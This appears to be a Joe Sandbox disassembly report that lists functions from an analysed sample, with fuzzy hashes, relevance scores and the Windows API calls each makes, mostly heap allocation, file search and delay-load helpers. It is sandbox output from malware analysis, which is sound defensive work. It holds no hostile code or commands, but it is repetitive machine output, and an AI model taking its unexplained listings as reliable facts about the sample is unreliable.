Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 026c7b8489c52d952429faa0e49f9c7c801ea3247ed34a57a0b770e0d8872f2f
Instruction ID: b1d1bbc71ea35f1b4b02b6fe9c30788b1bb7339e891d4da87488df9a053a407d
Opcode Fuzzy Hash: 026c7b8489c52d952429faa0e49f9c7c801ea3247ed34a57a0b770e0d8872f2f
Instruction Fuzzy Hash: 0D01A533D00528ABCF11ABA8CC919FEB7B5EF88740F0145A5E916B7252DAB4CD00C6A0

Function 00BDC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00BDB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BDB177

_free.LIBCMT ref: 00BDC4E5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: ab4ee813c0e3fd5f1839570eca9f26e7b4cdeecbacbd8e34e4e6b834ee5e1ef1
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: F601D6732003066BE7318F659885A6AFBEDEB85370F25096EE594933C1FB30A905CB64

Function 00BDB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BDB177

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ed3af53af9bc0d73ee55160139a75c07503b14ae82e592b463a8bcab33efd2b1
Instruction ID: e27e36ac98433dd2a9d08ea67773d08fdcc3f4c663a75338bd9026159d3258cb
Opcode Fuzzy Hash: ed3af53af9bc0d73ee55160139a75c07503b14ae82e592b463a8bcab33efd2b1
Instruction Fuzzy Hash: 0CF09036525125F6DB255A21AC19F9EF7C8EB41760B1A8197B808BB390FB30D90186A0

Function 00BD3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BD3C3F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 253a9e8601eaf208b846e626eded8f1795a0605ae76d3127aaaf0842059b6136
Instruction ID: ad82fc6d156f1216f0627288326355928b680cb54bd74620c7b3b7501d442870
Opcode Fuzzy Hash: 253a9e8601eaf208b846e626eded8f1795a0605ae76d3127aaaf0842059b6136
Instruction Fuzzy Hash: FCF0A7362103179F8F114E68EC04A9AB7D9EF45F607184566FA05E7291FB31EA20C791

Function 00BD8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 874196957e503d31aa44168927e9e24de7d873259c46b1c7a873346c5d1a9e76
Instruction ID: a48a2af9b876fb8d7bf0fed12c2e3f2abbd468f82e51cd8a2642991c5fe7ff53
Opcode Fuzzy Hash: 874196957e503d31aa44168927e9e24de7d873259c46b1c7a873346c5d1a9e76
Instruction Fuzzy Hash: 78E0653120611697D67126659C05F9FFBC8DF417A6F1502D3BC589B391FF20CC018AE1

Function 00BB5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB5AC2

Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dc3c7926d6a8ea6e199b7e0044ee0015d15bac1240dc34fa9d2847e54ec3fd57
Instruction ID: bbf8c6e9b466e4bb399852aed16259788cc9d854ffc7b06f12490215a9e050ca
Opcode Fuzzy Hash: dc3c7926d6a8ea6e199b7e0044ee0015d15bac1240dc34fa9d2847e54ec3fd57
Instruction Fuzzy Hash: 2D018C30920690DAD725FBB8C051BEDFBE4DF64304F5084DDA45663282CBB41B08D7A2

Function 00BBA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00BBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6C4
Part of subcall function 00BBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6F2
Part of subcall function 00BBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 88977e1d03f38aafdc94fa00596be9300d774850284be88756bc2db76a109f74
Instruction ID: 74c385865c7c293c432415fca063bac87541a195e579e4cb866d80ca3674f17c
Opcode Fuzzy Hash: 88977e1d03f38aafdc94fa00596be9300d774850284be88756bc2db76a109f74
Instruction Fuzzy Hash: 04F08231808790ABCB3257B48944BEBBBD06F2A331F048A89F1FD52196C2F551D89B23

Function 00BC0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00BC0E3D

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 05940d77c4ba2e60c513532e3183f08cba20661d0bc464e4b6193fa09433c704
Instruction ID: 828030120d6a1a656e1e7a81027d8ca52b46fb9722057b0518921ac5517e3985
Opcode Fuzzy Hash: 05940d77c4ba2e60c513532e3183f08cba20661d0bc464e4b6193fa09433c704
Instruction Fuzzy Hash: 2AD02B01A1509597DB11333C6859FFE2AC6CFC7311F0D0CEDF2456B283CE980C86A261

Function 00BCA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00BCA62C

Part of subcall function 00BCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BCA3DA

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: fcb85efc30d673f2769b079d05ba7efebe92e9eda7d00f5ccadb83ecf271fcfa
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: B1D0C97121020DBBDF42AFA19C52F7EBAD9EB40348F0481B9B842D5191EAB1ED10A666

Function 00BCE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00BCE5E3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: cd4c428546eb046fdcfa0f0a625147461b41e263258525952a244e1eb107a520
Instruction ID: 9229de2752912875e98878f3a93b5aa6e38f60f17df00c7cc2632ecb6ff50ce5
Opcode Fuzzy Hash: cd4c428546eb046fdcfa0f0a625147461b41e263258525952a244e1eb107a520
Instruction Fuzzy Hash: 26D0A9B0080280CAC612EBA89892F893AD4B322704FA80099B62492090CB7CC480C601

Function 00BCDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BC1B3E), ref: 00BCDD92

Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 4d5c2ffdacfb64f6ac146453c13c753eac2e2dc8fce49d9f5dec670d55745433
Instruction ID: d7ec463c8c0bfc007835e33d0c529bae9ed82d5a44ef7e6ae52bc4e1598c4598
Opcode Fuzzy Hash: 4d5c2ffdacfb64f6ac146453c13c753eac2e2dc8fce49d9f5dec670d55745433
Instruction Fuzzy Hash: 34D09E71254300BAD6012B51CD06F1E7AE2BB98B09F004598B284750B1CA729D21DB11

Function 00BB98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00BB97BE), ref: 00BB98C8

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: d9e78c5096153e6e690dc14edaffae4c2156cf0335fe0632993e42d2db2e4e23
Instruction ID: 94d5edf268de3362bd18fe521e15738aaa95622cff1cd68362760f2881c43181
Opcode Fuzzy Hash: d9e78c5096153e6e690dc14edaffae4c2156cf0335fe0632993e42d2db2e4e23
Instruction Fuzzy Hash: F4C01234400105878E2047289C480E573A1EE537E67B486D4C1388A0E1C3A2CC47EA10

Function 00BCE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b18fec7e3318e0b728ba35ce93101dd53e8da9c6df0934ccc21cbe6bc28ebff8
Instruction ID: 2a7879f3294785fc80cf4e4ff206121e775f6b674d005695470fa3f6343991d6
Opcode Fuzzy Hash: b18fec7e3318e0b728ba35ce93101dd53e8da9c6df0934ccc21cbe6bc28ebff8
Instruction Fuzzy Hash: 40B012D1259080FC350453061C03E3B01CCC2C3B10330C1BEFC25C0180E940FE451831

Function 00BCE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d0d907c0ca8ad6c329d2a65e0db0fe351cfa0daaa031f3684ab3fae2c3d6f86c
Instruction ID: 847844154d9b214c8dc54c84c7fe9715a1f792590bb860c4af7db010b18de8ed
Opcode Fuzzy Hash: d0d907c0ca8ad6c329d2a65e0db0fe351cfa0daaa031f3684ab3fae2c3d6f86c
Instruction Fuzzy Hash: 4AB012D535D180FC3104524A1C43E3B01DCD1C1B1033040BEF825C0080E980FE421931

Function 00BCE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 211815cd92171f5f11881fd5abb518169dbc470eaf81ddc19a7e687f4804fc44
Instruction ID: 8e404e154982b274036f3df039c6dc0d1e8da15b81dfee3856d4bba4d2b0586c
Opcode Fuzzy Hash: 211815cd92171f5f11881fd5abb518169dbc470eaf81ddc19a7e687f4804fc44
Instruction Fuzzy Hash: FCB012D5359180FC350412461C43D3B01CCC1C2B1033084BEFC21D0480E980FE421831

Function 00BCE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 87a8b49ed4eedc1c4de433efe3f01288d1dc1d33342456ddbdd9c4e0e3689833
Instruction ID: b5f3623e4e0b250e53ccc145bf8e5c124a97763edff15ef23c6afeecb5fa5f9d
Opcode Fuzzy Hash: 87a8b49ed4eedc1c4de433efe3f01288d1dc1d33342456ddbdd9c4e0e3689833
Instruction Fuzzy Hash: 19B012E1299080FC310452061D03E3B01ECC1C1B1033040BEF825D0080ED40FF421831

Function 00BCE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

